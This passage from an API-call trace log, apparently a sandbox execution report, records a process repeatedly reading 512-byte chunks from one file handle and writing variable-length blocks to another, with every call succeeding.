lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.595] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.595] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x82, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.596] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.596] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.597] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1c4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.597] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.598] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.598] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1b9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.599] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.599] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.600] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x45, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.600] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.601] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.601] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.602] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.602] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x232, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.603] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.603] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x234, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.604] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.604] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x24b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.605] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.605] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x248, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.606] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.606] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x253, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.607] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.607] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.608] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.608] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.609] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.609] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.610] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.610] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x321, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.611] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.611] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.612] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.612] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.613] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.613] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.614] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.614] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.615] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.615] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.616] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.616] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x276, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.616] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.617] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.617] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.618] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.618] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.619] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x313, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.619] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.620] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.620] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.621] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.621] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.622] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ab, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.622] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.623] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x318, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.623] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.624] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.625] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.626] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ad, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.626] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.627] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.627] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.628] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.628] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x68, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.629] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.629] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.630] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.630] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.631] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.631] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.632] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.632] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.633] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.633] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.633] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.634] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.634] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.635] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.635] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.636] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.636] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.637] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.637] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.638] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.638] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.639] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.639] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.640] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x342, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.640] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.641] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.641] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.642] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.642] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.643] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0025.643] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0025.644] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: 